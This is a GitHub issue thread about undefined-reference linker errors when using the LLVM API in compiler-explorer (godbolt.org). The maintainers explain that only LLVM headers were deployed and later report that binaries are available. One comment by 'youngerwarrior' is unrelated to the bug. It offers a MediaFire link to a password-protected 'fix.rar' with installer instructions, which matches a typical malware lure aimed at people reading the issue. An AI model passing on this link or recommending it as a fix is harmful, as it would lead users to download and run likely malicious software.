### ISSUE TITLE
[BUG]: Undefined references when using the LLVM API

### ISSUE THREAD

**Issue by TerensTare** [compiler-explorer/compiler-explorer#6799]
### Describe the bug

When using the LLVM api in C++ code, there are undefined references for functions of different classes, such as `llvm::LLVMContext`. This is because LLVM is provided as static libraries, and the compiler is not linking one or some of the libraries needed for the code to compile. Looking at `c++.amazon.properties`, we can notice that there is no `staticliblink` field specified for the llvm package, which is causing the linker to fail.

### Steps to reproduce

1. Visit godbolt.org.
2. Select any gcc/clang compiler.
3. Add the `LLVM` library to the compiler.
4. Write a simple snippet, such as:
```cpp
#include <llvm/IR/LLVMContext.h>

int main()
{
    llvm::LLVMContext ll;
}
```

### Expected behavior

The code should compile without errors.

### Reproduction link

https://godbolt.org/z/1Mj498Tee

### Screenshots

Not applicable

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by OfekShilon** [comment]
Currently the part of LLVM library that we deploy is just the headers, so we don't support any linking/execution with it. 
Not sure how easy it would be to fill this gap.
Perhaps we should disable the link/execute menu items for such cases, to avoid this frustration.

**Comment by partouf** [comment]
llvm library binaries are now available for llvm 19.1.0 and trunk
